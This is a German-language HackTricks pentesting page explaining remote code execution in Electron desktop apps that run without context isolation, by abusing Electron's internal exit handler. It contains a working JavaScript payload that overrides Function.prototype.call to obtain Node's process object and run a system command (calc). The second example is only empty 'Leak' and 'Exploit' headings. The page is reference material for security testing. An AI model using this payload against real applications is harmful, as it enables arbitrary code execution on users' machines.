hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
2024-02-10 15:36:32 +00:00

4.5 KiB

Electron contextIsolation RCE über den internen Electron-Code

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Beispiel 1

Beispiel von https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

Der "exit"-Event-Listener wird immer vom internen Code festgelegt, wenn das Laden der Seite beginnt. Dieses Ereignis wird kurz vor der Navigation ausgelöst:

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

{% embed url="664c184fcb/lib/common/asar.js (L30-L36)" %}

8a44289089/bin/events.js (L156-L231) -- Existiert nicht mehr

Dann geht es hier weiter:

Wo "self" das Prozessobjekt von Node ist:

Das Prozessobjekt hat eine Referenz auf die "require"-Funktion:

process.mainModule.require

Da der handler.call das process-Objekt empfangen wird, können wir es überschreiben, um beliebigen Code auszuführen:

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

Beispiel 2

Holen Sie sich das require-Objekt aus der Prototyp-Verschmutzung. Von https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

Leak:

Exploit:

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!